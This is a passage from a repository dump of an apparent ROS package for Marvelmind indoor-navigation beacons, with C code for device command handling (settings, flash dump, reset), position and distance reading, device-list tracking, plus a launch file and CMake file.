success\\r\\n\", (int) submapId);\r\n } else {\r\n printf(\"Submap %d freeze failed\\r\\n\", (int) submapId);\r\n }\r\n }\r\n else if (strcmp(token2,\"unfreeze\") == 0) {\r\n if (mmUnfreezeSubmap(submapId)) {\r\n printf(\"Submap %d unfreeze success\\r\\n\", (int) submapId);\r\n } else {\r\n printf(\"Submap %d unfreeze failed\\r\\n\", (int) submapId);\r\n }\r\n }\r\n else if (strcmp(token2,\"get\") == 0) {\r\n marvelmindShowSubmapSettings((int) submapId);\r\n }\r\n else if (strcmp(token2,\"testset\") == 0) {\r\n marvelmindTestSetSubmapSettings((int) submapId);\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Check and execute map command\r\nbool marvelmindCheckMapCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"map\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (strcmp(token2,\"erase\") == 0) {\r\n if (mmEraseMap()) {\r\n printf(\"Erase map success\\r\\n\");\r\n } else {\r\n printf(\"Erase map failed\\r\\n\");\r\n }\r\n return true;\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Command to get/set update rate setting\r\nbool marvelmindCheckRateCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"rate\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (strcmp(token2,\"get\") == 0) {\r\n float updRate;\r\n if (mmGetUpdateRateSetting(&updRate)) {\r\n printf(\"Update rate setting: %.2f Hz\\r\\n\", updRate);\r\n } else {\r\n printf(\"Update rate setting read failed\\r\\n\");\r\n }\r\n return true;\r\n }\r\n\r\n if (strcmp(token2,\"set\") == 0) {\r\n if (token3 == NULL)\r\n return true;\r\n\r\n float updRate= atof(token3);\r\n if (mmSetUpdateRateSetting(&updRate)) {\r\n printf(\"Update rate setting write success\\r\\n\");\r\n } else {\r\n printf(\"Update rate setting write failed\\r\\n\");\r\n }\r\n return 
true;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nstatic char *marvelmindDSPFilterString(uint8_t filterIndex) {\r\n switch(filterIndex) {\r\n case MM_US_FILTER_19KHZ: return \"19 kHz\";\r\n case MM_US_FILTER_25KHZ: return \"25 kHz\";\r\n case MM_US_FILTER_31KHZ: return \"31 kHz\";\r\n case MM_US_FILTER_37KHZ: return \"37 kHz\";\r\n case MM_US_FILTER_45KHZ: return \"45 kHz\";\r\n case MM_US_FILTER_56KHZ: return \"56 kHz\";\r\n default: return \"unknown\";\r\n }\r\n}\r\n\r\n// Command to get/set ultrasound settings\r\nbool marvelmindCheckUltrasoundCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"usound\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token3);\r\n\r\n if (strcmp(token2,\"get\") == 0) {\r\n MarvelmindUltrasoundSettings us;\r\n if (mmGetUltrasoundSettings(address, &us)) {\r\n printf(\"Ultrasound settings for beacon %d:\\r\\n\", address);\r\n printf(\" Tx frequency, Hz: %d\\r\\n\", (int) us.txFrequency_hz);\r\n printf(\" Tx number of periods: %d\\r\\n\", (int) us.txPeriodsNumber);\r\n if (us.rxAmplifierAGC) {\r\n printf(\" Amplification: AGC\\r\\n\");\r\n } else {\r\n printf(\" Amplification: manual\\r\\n\");\r\n }\r\n if (!us.rxAmplifierAGC) {\r\n printf(\" Amplification: %d\\r\\n\", (int) us.rxAmplificationManual);\r\n }\r\n printf(\" Sensors normal: %d %d %d %d %d\\r\\n\",\r\n boolAsInt(us.sensorsNormal[0]),\r\n boolAsInt(us.sensorsNormal[1]),\r\n boolAsInt(us.sensorsNormal[2]),\r\n boolAsInt(us.sensorsNormal[3]),\r\n boolAsInt(us.sensorsNormal[4])\r\n );\r\n printf(\" Sensors frozen: %d %d %d %d %d\\r\\n\",\r\n boolAsInt(us.sensorsFrozen[0]),\r\n boolAsInt(us.sensorsFrozen[1]),\r\n boolAsInt(us.sensorsFrozen[2]),\r\n boolAsInt(us.sensorsFrozen[3]),\r\n boolAsInt(us.sensorsFrozen[4])\r\n );\r\n\r\n printf(\" Rx DSP filter: %s\\r\\n\", marvelmindDSPFilterString(us.rxDSPFilterIndex));\r\n } else {\r\n printf(\"Ultrasound settings read failed\\r\\n\");\r\n }\r\n return true;\r\n }\r\n\r\n if (strcmp(token2,\"testset\") == 0) {\r\n MarvelmindUltrasoundSettings us;\r\n printf(\"Test writing ultrasound settings to beacon %d\\r\\n\", (int) address);\r\n\r\n us.txFrequency_hz= 31234;\r\n us.txPeriodsNumber= 34;\r\n us.rxAmplifierAGC= false;\r\n us.rxAmplificationManual= 2345;\r\n\r\n us.sensorsNormal[MM_SENSOR_RX1]= true;\r\n us.sensorsNormal[MM_SENSOR_RX2]= false;\r\n us.sensorsNormal[MM_SENSOR_RX3]= false;\r\n us.sensorsNormal[MM_SENSOR_RX4]= true;\r\n us.sensorsNormal[MM_SENSOR_RX5]= false;\r\n\r\n us.sensorsFrozen[MM_SENSOR_RX1]= true;\r\n us.sensorsFrozen[MM_SENSOR_RX2]= false;\r\n us.sensorsFrozen[MM_SENSOR_RX3]= false;\r\n us.sensorsFrozen[MM_SENSOR_RX4]= true;\r\n us.sensorsFrozen[MM_SENSOR_RX5]= true;\r\n\r\n us.rxDSPFilterIndex= MM_US_FILTER_45KHZ;\r\n\r\n if (mmSetUltrasoundSettings(address, &us)) {\r\n printf(\"Ultrasound settings write success\\r\\n\");\r\n } else {\r\n printf(\"Ultrasound settings write failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nbool marvelmindCheckAxesCommand(char *token1, char *token2, char *token3, char *token4) {\r\n if (strcmp(token1,\"axes\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n if (token4 == NULL)\r\n return true;\r\n\r\n uint8_t address_0= atoi(token2);\r\n uint8_t address_x= atoi(token3);\r\n uint8_t address_y= atoi(token4);\r\n\r\n if (mmBeaconsToAxes(address_0, address_x, address_y)) {\r\n 
printf(\"Beacons to axes success\\r\\n\");\r\n } else {\r\n printf(\"Beacons to axes failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\nstatic uint8_t dump_buffer[65536];\r\nbool marvelmindCheckReadDumpCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"read_dump\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n\r\n uint32_t offset= atoi(token2);\r\n uint32_t size= atoi(token3);\r\n if (size == 0)\r\n return true;\r\n if (size>65536UL)\r\n size= 65536UL;\r\n\r\n uint32_t i;\r\n\r\n //uint8_t *dump_buffer= malloc(size);\r\n\r\n if (mmReadFlashDump(offset, size, &dump_buffer[0])) {\r\n printf(\"Read flash dump success\\r\\n\");\r\n for(i=0;i<size;i++) {\r\n printf(\" %02x\", dump_buffer[i]);\r\n }\r\n printf(\"\\r\\n\");\r\n } else {\r\n printf(\"Read flash dump failed\\r\\n\");\r\n }\r\n\r\n //free(dump_buffer);\r\n\r\n return true;\r\n}\r\n\r\nbool marvelmindCheckWriteDumpCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"write_dump_test\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n uint32_t offset= atoi(token2);\r\n uint32_t size= atoi(token3);\r\n if (size == 0)\r\n return true;\r\n if (size>65536UL)\r\n size= 65536UL;\r\n\r\n uint32_t i;\r\n\r\n //uint8_t *dump_buffer= malloc(size);\r\n for(i=0;i<size;i++) {\r\n dump_buffer[i]= i+1;\r\n }\r\n\r\n if (mmWriteFlashDump(offset, size, &dump_buffer[0])) {\r\n printf(\"Write flash dump success\\r\\n\");\r\n } else {\r\n printf(\"Write flash dump failed\\r\\n\");\r\n }\r\n\r\n //free(dump_buffer);\r\n\r\n return true;\r\n}\r\n\r\nbool marvelmindCheckResetCommand(char *token1, char *token2) {\r\n if (strcmp(token1,\"reset\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n uint32_t address= atoi(token2);\r\n\r\n if (mmResetDevice(address)) {\r\n printf(\"Reset device success\\r\\n\");\r\n } else {\r\n printf(\"Reset device failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\nbool marvelmindCheckTemperatureCommand(char *token1, char *token2, char *token3) {\r\n if (strcmp(token1,\"temperature\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (strcmp(token2,\"get\") == 0) {\r\n int8_t temperature;\r\n if (mmGetAirTemperature(&temperature)) {\r\n printf(\"Temperature %d celsius \\r\\n\", (int) temperature);\r\n } else {\r\n printf(\"Temperature read failed\\r\\n\");\r\n }\r\n } else if (strcmp(token2,\"set\") == 0) {\r\n if (token3 == NULL)\r\n return true;\r\n\r\n int8_t temperature= atoi(token3);\r\n if (mmSetAirTemperature(temperature)) {\r\n printf(\"Temperature write success \\r\\n\");\r\n } else {\r\n printf(\"Temperature write failed\\r\\n\");\r\n }\r\n }\r\n\r\n return true;\r\n}\r\n\r\n\r\n// Change connection state\r\nstatic void switchToConState(ConState newConState) {\r\n switch(newConState) {\r\n case waitPort: {\r\n printf(\"Waiting for port...\\r\\n\");\r\n break;\r\n }\r\n case waitDevice: {\r\n printf(\"Trying connect to device...\\r\\n\");\r\n break;\r\n }\r\n case connected: {\r\n printf(\"Device is connected via USB.\\r\\n\");\r\n printMMDeviceVersionAndId(&usbDevVersion);\r\n\r\n deviceTypeUSB= getMMDeviceType(usbDevVersion.fwVerDeviceType);\r\n printMMDeviceType(&deviceTypeUSB);\r\n break;\r\n }\r\n }\r\n conState= newConState;\r\n}\r\n\r\nbool marvelmindCheckSetLocCommand(char *token1, char *token2, char *token3, char *token4, char *token5) {\r\n if 
(strcmp(token1,\"setloc\") != 0)\r\n return false;\r\n\r\n if (token2 == NULL)\r\n return true;\r\n\r\n if (token3 == NULL)\r\n return true;\r\n\r\n if (token4 == NULL)\r\n return true;\r\n\r\n if (token5 == NULL)\r\n return true;\r\n\r\n uint8_t address= atoi(token2);\r\n float pos_x_m= atof(token3);\r\n float pos_y_m= atof(token4);\r\n float pos_z_m= atof(token5);\r\n\r\n if (mmSetBeaconLocation(address, pos_x_m*1000.0f, pos_y_m*1000.0f, pos_z_m*1000.0f)) {\r\n printf(\"Location setup success\\r\\n\");\r\n } else {\r\n printf(\"Location setup failed\\r\\n\");\r\n }\r\n\r\n return true;\r\n}\r\n\r\n// Working cycle if modem is connected via USB\r\nvoid marvelmindModemCycle() {\r\n static uint8_t failCounter= 0;\r\n\r\n marvelmindDevicesReadIfNeeded();\r\n\r\n switch(marvelmindLocationsReadIfNeeded()) {\r\n case readSuccess: {\r\n failCounter= 0;\r\n break;\r\n }\r\n case readFail: {\r\n failCounter++;\r\n if (failCounter>10) {\r\n marvelmindReopenPort();\r\n break;\r\n }\r\n break;\r\n }\r\n case notRead: {\r\n break;\r\n }\r\n }\r\n}\r\n\r\n// Working cycle if beacon is connected via USB\r\nvoid marvelmindBeaconCycle() {\r\n //TODO\r\n}\r\n\r\n// Marvelmind communication state machine\r\nbool marvelmindCycle() {\r\n // printf(\"%u\\n\",conState);\r\n switch(conState) {\r\n case waitPort: {\r\n // if (mmOpenPortByName(\"/dev/Modem\")) {\r\n if (mmOpenPort()) {\r\n switchToConState(waitDevice);\r\n return false;\r\n }\r\n sleep_ms(1);\r\n return false;\r\n }\r\n case waitDevice: {\r\n if (mmGetVersionAndId(MM_USB_DEVICE_ADDRESS, &usbDevVersion)) {\r\n switchToConState(connected);\r\n }\r\n sleep_ms(1);\r\n return false;\r\n }\r\n case connected: {\r\n switch(deviceTypeUSB) {\r\n case modem: {\r\n marvelmindModemCycle();\r\n return true;\r\n }\r\n case beacon:\r\n case hedgehog: {\r\n marvelmindBeaconCycle();\r\n return true;\r\n }\r\n\r\n case unknown: {\r\n return true;\r\n }\r\n }\r\n return true;\r\n }\r\n } \r\n return 0;\r\n}\r\n\r\nvoid marvelmindStart() {\r\n marvelmindAPILoad();// Load Marvelmind API library\r\n initMarvelmindDevicesList();\r\n initMarvelmindPos();\r\n switchToConState(waitPort);// Start waiting port connection\r\n}\r\n\r\nvoid marvelmindFinish() {\r\n mmClosePort();// Close port (if was opened)\r\n\r\n marvelmindAPIFree();// Free Marvelmind API library memory\r\n}\r\n"
},
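`marvelmindCycle` above is a small connection state machine: wait for the port to open, then wait for the device to answer a version request, then dispatch each tick by device type (modem vs. beacon/hedgehog). The same control flow reduced to a Python sketch; the `api` object and its method names are placeholders standing in for the C API calls (`mmOpenPort`, `mmGetVersionAndId`, the per-device cycles):

```python
from enum import Enum, auto

class ConState(Enum):
    WAIT_PORT = auto()
    WAIT_DEVICE = auto()
    CONNECTED = auto()

def cycle(state, api):
    # One tick of the state machine; returns the (possibly advanced) state.
    if state is ConState.WAIT_PORT:
        return ConState.WAIT_DEVICE if api.open_port() else state
    if state is ConState.WAIT_DEVICE:
        return ConState.CONNECTED if api.get_version_and_id() else state
    api.run_device_cycle()  # modem or beacon work once connected
    return state
```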
{
"alpha_fraction": 0.6995074152946472,
"alphanum_fraction": 0.7044335007667542,
"avg_line_length": 30.30769157409668,
"blob_id": "50471e479470d8db67fbfc77bfacff0e6b564010",
"content_id": "713212e94fcb5070eba40619572546d9533d74ef",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 13,
"path": "/marvelmind_nav/launch/marvel_base_launch.py",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "from launch import LaunchDescription\nfrom launch_ros.actions import LifecycleNode\n# from launch_ros.actions import Node\nimport sys\n\ndef generate_launch_description():\n return LaunchDescription([\n LifecycleNode(package='marvelmind_nav', node_executable='marvelmind_nav',\n node_name='lc_marvel2', output='screen'),\n ])\n\ndef main(argv=sys.argv[1:]):\n print(\"Running main\")"
},
{
"alpha_fraction": 0.5185671448707581,
"alphanum_fraction": 0.5410727858543396,
"avg_line_length": 30.512195587158203,
"blob_id": "f529d7c9744850e0ac249d001d0939115d7d1ffa",
"content_id": "623f1e7fb591777292cda66980af4af5953ee091",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5332,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 164,
"path": "/marvelmind_nav/src/marvelmind_pos.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <time.h>\r\n#include \"marvelmind_nav/marvelmind_pos.h\"\r\n#include \"marvelmind_nav/marvelmind_devices.h\"\r\n\r\n#ifdef WIN32\r\nstatic clock_t prevReadTime;\r\n#else\r\nstatic struct timespec prevReadTime;\r\n#endif\r\n\r\n////////////////////////////////////////////////////////////////////////\r\n\r\n// Read raw distances between Marvelmind devices\r\nvoid marvelmindReadRawDistances() {\r\n MarvelmindDistances distPack;\r\n\r\n if (mmGetLastDistances(&distPack)) {\r\n uint8_t n= distPack.numDistances;\r\n uint8_t i;\r\n for(i=0; i<n; i++) {\r\n uint8_t addressRx= distPack.distance[i].addressRx;\r\n uint8_t addressTx= distPack.distance[i].addressTx;\r\n if ( (addressRx == 0) || (addressTx == 0))\r\n continue;\r\n\r\n uint32_t dist= distPack.distance[i].distance_mm;\r\n\r\n MarvelmindDevice *mmDeviceRx= marvelmindUpdateDistance(addressRx, addressTx, dist);\r\n if (mmDeviceRx != NULL) {\r\n printf(\"Raw distance: %d ==> %d : %.3f \\r\\n\", (int) addressTx, (int) addressRx, (float) dist/1000.0);\r\n }\r\n }//for i\r\n }\r\n}\r\n\r\n#if MM_LOCATIONS_VERSION==1\r\n// Obsolete version of function for API V1, V2 - read locations without angle\r\n// Read new locations of Marvelmind devices\r\nMMPosReadStatus marvelmindLocationsReadIfNeeded() {\r\n #ifdef WIN32\r\n clock_t curTime= clock();\r\n double passedSec= ((double)(curTime - prevReadTime))/CLOCKS_PER_SEC;\r\n #else\r\n struct timespec curTime;\r\n clock_gettime(CLOCK_REALTIME, &curTime);\r\n double passedSec= getPassedTime(&prevReadTime, &curTime);\r\n #endif\r\n\r\n if (passedSec<(1.0/MARVELMIND_POS_READ_RATE)) {\r\n return notRead;\r\n }\r\n prevReadTime= curTime;\r\n\r\n MarvelmindLocationsPack posPack;\r\n if (mmGetLastLocations(&posPack)) {\r\n uint8_t i;\r\n MarvelmindDeviceLocation pos;\r\n MarvelmindDevice *mmDevice;\r\n\r\n if (posPack.lastDistUpdated) {\r\n marvelmindReadRawDistances();\r\n }\r\n\r\n for(i=0;i<MM_LOCATIONS_PACK_SIZE;i++) {\r\n pos= posPack.pos[i];\r\n if (pos.address == 0)\r\n continue;\r\n\r\n mmDevice= marvelmindUpdateLocation(pos.address,&pos);\r\n if (mmDevice == NULL)\r\n continue;\r\n\r\n if (mmDevice->deviceType == hedgehog) {\r\n printf(\"Hedge %d location: X=%.3f, Y=%.3f, Z=%.3f, quality= %d %%\\r\\n\",\r\n (int) pos.address,\r\n (float) pos.x_mm/1000.0, (float) pos.y_mm/1000.0, (float) pos.z_mm/1000.0,\r\n (int) pos.quality);\r\n }\r\n else if (mmDevice->deviceType == beacon) {\r\n printf(\"Beacon %d location: X=%.3f, Y=%.3f, Z=%.3f \\r\\n\",\r\n (int) pos.address,\r\n (float) pos.x_mm/1000.0, (float) pos.y_mm/1000.0, (float) pos.z_mm/1000.0);\r\n }\r\n }//for i\r\n\r\n return readSuccess;\r\n }\r\n\r\n return readFail;\r\n}\r\n#endif//#if MM_LOCATIONS_VERSION==1\r\n\r\n#if MM_LOCATIONS_VERSION==2\r\n// Read new locations of Marvelmind devices\r\nMMPosReadStatus marvelmindLocationsReadIfNeeded() {\r\n #ifdef WIN32\r\n clock_t curTime= clock();\r\n double passedSec= ((double)(curTime - prevReadTime))/CLOCKS_PER_SEC;\r\n #else\r\n struct timespec curTime;\r\n clock_gettime(CLOCK_REALTIME, &curTime);\r\n double passedSec= getPassedTime(&prevReadTime, &curTime);\r\n #endif\r\n\r\n if (passedSec<(1.0/MARVELMIND_POS_READ_RATE)) {\r\n return notRead;\r\n }\r\n prevReadTime= curTime;\r\n\r\n MarvelmindLocationsPack2 posPack;\r\n if (mmGetLastLocations2(&posPack)) {\r\n uint8_t i;\r\n MarvelmindDeviceLocation2 pos;\r\n MarvelmindDevice *mmDevice;\r\n\r\n if (posPack.lastDistUpdated) {\r\n marvelmindReadRawDistances();\r\n }\r\n\r\n 
for(i=0;i<MM_LOCATIONS_PACK_SIZE;i++) {\r\n pos= posPack.pos[i];\r\n if (pos.address == 0)\r\n continue;\r\n\r\n mmDevice= marvelmindUpdateLocation(pos.address,&pos);\r\n if (mmDevice == NULL)\r\n continue;\r\n\r\n if (mmDevice->deviceType == hedgehog) {\r\n char angs[64];\r\n if (pos.angleReady) {\r\n sprintf(angs, \"angle= %.1f\",((float) pos.angle)/10.0f);\r\n } else {\r\n sprintf(angs, \"no angle\");\r\n }\r\n printf(\"Hedge %d location: X=%.3f, Y=%.3f, Z=%.3f, %s, quality= %d %%\\r\\n\",\r\n (int) pos.address,\r\n (float) pos.x_mm/1000.0, (float) pos.y_mm/1000.0, (float) pos.z_mm/1000.0,\r\n angs, (int) pos.quality);\r\n }\r\n else if (mmDevice->deviceType == beacon) {\r\n printf(\"Beacon %d location: X=%.3f, Y=%.3f, Z=%.3f \\r\\n\",\r\n (int) pos.address,\r\n (float) pos.x_mm/1000.0, (float) pos.y_mm/1000.0, (float) pos.z_mm/1000.0);\r\n }\r\n }//for i\r\n\r\n return readSuccess;\r\n }\r\n\r\n return readFail;\r\n}\r\n#endif//#if MM_LOCATIONS_VERSION==2\r\n\r\n// Initialize Marvelmind positions module\r\nvoid initMarvelmindPos() {\r\n#ifdef WIN32\r\n prevReadTime= clock();\r\n#else\r\n\tclock_gettime(CLOCK_REALTIME, &prevReadTime);\r\n#endif\r\n}\r\n"
},
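Both variants of `marvelmindLocationsReadIfNeeded` above rate-limit themselves: they compare the time since the previous read against `1.0 / MARVELMIND_POS_READ_RATE` and return `notRead` if the interval has not elapsed. The same guard in Python, using a monotonic clock; the rate constant and function names are illustrative:

```python
import time

READ_RATE_HZ = 8.0            # stands in for MARVELMIND_POS_READ_RATE
_prev_read = time.monotonic()

def read_if_needed(read_locations):
    global _prev_read
    now = time.monotonic()
    if now - _prev_read < 1.0 / READ_RATE_HZ:
        return "notRead"      # too soon since the last read
    _prev_read = now
    return "readSuccess" if read_locations() else "readFail"
```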
{
"alpha_fraction": 0.7916666865348816,
"alphanum_fraction": 0.8083333373069763,
"avg_line_length": 23,
"blob_id": "5240a0d5a8d5ee75b0374c37b2d3801dcb03c38a",
"content_id": "6f1d4718c8e292f162674319e1da6c5253ee765e",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 5,
"path": "/ros_marvelmind_package/CMakeLists.txt",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.5)\nproject(ros_marvelmind_package)\n\nfind_package(ament_cmake REQUIRED)\nament_package()\n"
},
{
"alpha_fraction": 0.5874231457710266,
"alphanum_fraction": 0.597169041633606,
"avg_line_length": 25.71382713317871,
"blob_id": "9e2a0cdce19ffd7296ccf24b8c65bc1661941f57",
"content_id": "45ccb0872305bd1d0bfb23874619e30660358451",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 8619,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 311,
"path": "/marvelmind_nav/src/marvelmind_devices.c",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <time.h>\r\n#include \"marvelmind_nav/marvelmind_devices.h\"\r\n\r\ntypedef struct {\r\n uint8_t numDevices;\r\n MarvelmindDevice devices[MM_MAX_DEVICES_COUNT];\r\n} MarvelmindDevicesListExt;\r\n\r\nstatic MarvelmindDevicesListExt mmDevList;\r\n\r\n#ifdef WIN32\r\nstatic clock_t prevReadTime;\r\n#else\r\nstatic struct timespec prevReadTime;\r\n#endif\r\n\r\n// Returns true if devices info is same\r\nstatic bool sameDevice(MarvelmindDeviceInfo *dev1, MarvelmindDeviceInfo *dev2) {\r\n if (dev1->address != dev2->address) return false;\r\n if (dev1->isDuplicatedAddress != dev2->isDuplicatedAddress) return false;\r\n if (dev1->isSleeping != dev2->isSleeping) return false;\r\n\r\n if (dev1->fwVerMajor != dev2->fwVerMajor) return false;\r\n if (dev1->fwVerMinor != dev2->fwVerMinor) return false;\r\n if (dev1->fwVerMinor2 != dev2->fwVerMinor2) return false;\r\n if (dev1->fwVerDeviceType != dev2->fwVerDeviceType) return false;\r\n\r\n if (dev1->fwOptions != dev2->fwOptions) return false;\r\n\r\n if (dev1->flags != dev2->flags) return false;\r\n\r\n return true;\r\n}\r\n\r\n// Update device in list\r\nstatic void updateDevice(uint8_t index, MarvelmindDeviceInfo *info) {\r\n bool connected= ((info->flags&0x01) != 0);\r\n mmDevList.devices[index].devConnected= connected;\r\n\r\n printf(\"Device %d updated\\r\\n\", (int) info->address);\r\n\r\n if (connected) {\r\n MarvelmindDeviceVersion version;\r\n if (!mmGetVersionAndId(info->address, &version)) {\r\n printf(\"Failed read version of device: %d\\r\\n\", (int) info->address);\r\n return;\r\n }\r\n mmDevList.devices[index].version= version;\r\n\r\n printMMDeviceVersionAndId(&version);\r\n mmDevList.devices[index].deviceType= getMMDeviceType(version.fwVerDeviceType);\r\n printMMDeviceType(&mmDevList.devices[index].deviceType);\r\n } else {\r\n if (info->isSleeping) {\r\n printf(\"Device %d is sleeping\\r\\n\", (int) info->address);\r\n } else {\r\n printf(\"Device %d connecting...\\r\\n\", (int) info->address);\r\n }\r\n }\r\n\r\n mmDevList.devices[index].info= *info;\r\n}\r\n\r\n// Remove device from list\r\nstatic void removeDevice(uint8_t index) {\r\n if (mmDevList.numDevices == 0) return;\r\n\r\n printf(\"Device updated: %d\\r\\n\", (int) mmDevList.devices[index].info.address);\r\n\r\n uint8_t i;\r\n mmDevList.numDevices--;\r\n if (mmDevList.numDevices > 0) {\r\n for(i=index; i<mmDevList.numDevices;i++) {\r\n mmDevList.devices[i]= mmDevList.devices[i+1];\r\n }\r\n }\r\n}\r\n\r\n// Add device to list\r\nstatic void addDevice(MarvelmindDeviceInfo *info) {\r\n if (mmDevList.numDevices >= MM_MAX_DEVICES_COUNT)\r\n return;\r\n\r\n updateDevice(mmDevList.numDevices, info);\r\n printf(\"Device added: %d\\r\\n\", (int) info->address);\r\n\r\n #if MM_LOCATIONS_VERSION==1\r\n MarvelmindDeviceLocation *ppos= &mmDevList.devices[mmDevList.numDevices].pos;\r\n ppos->x_mm= 0;\r\n ppos->y_mm= 0;\r\n ppos->z_mm= 0;\r\n #endif\r\n\r\n #if MM_LOCATIONS_VERSION==2\r\n MarvelmindDeviceLocation2 *ppos= &mmDevList.devices[mmDevList.numDevices].pos;\r\n ppos->x_mm= 0;\r\n ppos->y_mm= 0;\r\n ppos->z_mm= 0;\r\n #endif\r\n\r\n mmDevList.numDevices++;\r\n}\r\n\r\n// Remove devices not present in new list\r\nstatic void removeAbsentDevices(MarvelmindDevicesList *pNewList) {\r\n bool cont;\r\n uint8_t i,j;\r\n\r\n for(i=0;i<mmDevList.numDevices;i++) {\r\n uint8_t address= mmDevList.devices[i].info.address;\r\n MarvelmindDeviceInfo *info_i= &mmDevList.devices[i].info;\r\n\r\n cont= false;\r\n 
for(j=0;j<pNewList->numDevices;j++) {\r\n if (sameDevice(info_i,&pNewList->devices[j])) {\r\n cont= true;\r\n break;\r\n }\r\n\r\n if (address == pNewList->devices[j].address) {\r\n updateDevice(i, &pNewList->devices[j]);\r\n cont= true;\r\n break;\r\n }\r\n }//for j\r\n if (cont)\r\n continue;\r\n\r\n // device not found in new list\r\n removeDevice(i);\r\n }//for i\r\n}\r\n\r\n// Add new devices from new list\r\nstatic void addNewDevices(MarvelmindDevicesList *pNewList) {\r\n bool cont;\r\n uint8_t i,j;\r\n\r\n for(i=0;i<pNewList->numDevices;i++) {\r\n uint8_t address= pNewList->devices[i].address;\r\n MarvelmindDeviceInfo *info_i= &pNewList->devices[i];\r\n\r\n cont= false;\r\n for(j=0;j<mmDevList.numDevices;j++) {\r\n if (sameDevice(info_i,&mmDevList.devices[j].info)) {\r\n cont= true;\r\n break;\r\n }\r\n\r\n if (address == mmDevList.devices[j].info.address) {\r\n updateDevice(j, info_i);\r\n cont= true;\r\n break;\r\n }\r\n }//for j\r\n if (cont)\r\n continue;\r\n\r\n // device not found in current list\r\n addDevice(info_i);\r\n }//for i\r\n}\r\n\r\n// check lists identity\r\nstatic bool checkDevicesList(MarvelmindDevicesList *pNewList) {\r\n uint8_t n= pNewList->numDevices;\r\n\r\n if (n == 0) {\r\n return true;\r\n }\r\n\r\n uint8_t i;\r\n for(i=0;i<n;i++) {\r\n if (!sameDevice(&pNewList->devices[i], &mmDevList.devices[i].info)) {\r\n if (pNewList->devices[i].address == mmDevList.devices[i].info.address) {\r\n updateDevice(i, &pNewList->devices[i]);\r\n } else {\r\n return false;\r\n }\r\n }\r\n }//for i\r\n\r\n return true;\r\n}\r\n\r\n// Read Marvelmind devices list from modem\r\nvoid marvelmindDevicesReadIfNeeded() {\r\n\t#ifdef WIN32\r\n clock_t curTime= clock();\r\n double passedSec= ((double)(curTime - prevReadTime))/CLOCKS_PER_SEC;\r\n #else\r\n struct timespec curTime;\r\n clock_gettime(CLOCK_REALTIME, &curTime);\r\n double passedSec= getPassedTime(&prevReadTime, &curTime);\r\n #endif\r\n if (passedSec<1.0) {\r\n return;\r\n }\r\n\r\n prevReadTime= curTime;\r\n\r\n MarvelmindDevicesList newList;\r\n if (!mmGetDevicesList(&newList)) {\r\n return;// failed read\r\n }\r\n\r\n if (newList.numDevices == mmDevList.numDevices) {\r\n // check lists identity\r\n if (checkDevicesList(&newList))\r\n return;\r\n }\r\n\r\n removeAbsentDevices(&newList);\r\n addNewDevices(&newList);\r\n}\r\n\r\n// Get device data structure\r\nMarvelmindDevice *getMarvelmindDevice(uint8_t address) {\r\n uint8_t i;\r\n\r\n if (mmDevList.numDevices == 0)\r\n return NULL;\r\n\r\n for(i=0;i<mmDevList.numDevices;i++) {\r\n if (mmDevList.devices[i].info.address == address) {\r\n return &mmDevList.devices[i];\r\n }\r\n }\r\n\r\n return NULL;\r\n}\r\n\r\n#if MM_LOCATIONS_VERSION==1\r\n// Update device location\r\nMarvelmindDevice *marvelmindUpdateLocation(uint8_t address, MarvelmindDeviceLocation *ppos) {\r\n MarvelmindDevice *mmDevice;\r\n\r\n mmDevice= getMarvelmindDevice(address);\r\n if (mmDevice == NULL)\r\n return NULL;\r\n\r\n if (mmDevice->pos.x_mm == ppos->x_mm)\r\n if (mmDevice->pos.y_mm == ppos->y_mm)\r\n if (mmDevice->pos.z_mm == ppos->z_mm) {\r\n return NULL;\r\n }\r\n\r\n mmDevice->pos= *ppos;\r\n\r\n return mmDevice;\r\n}\r\n#endif// #if MM_LOCATIONS_VERSION==1\r\n\r\n#if 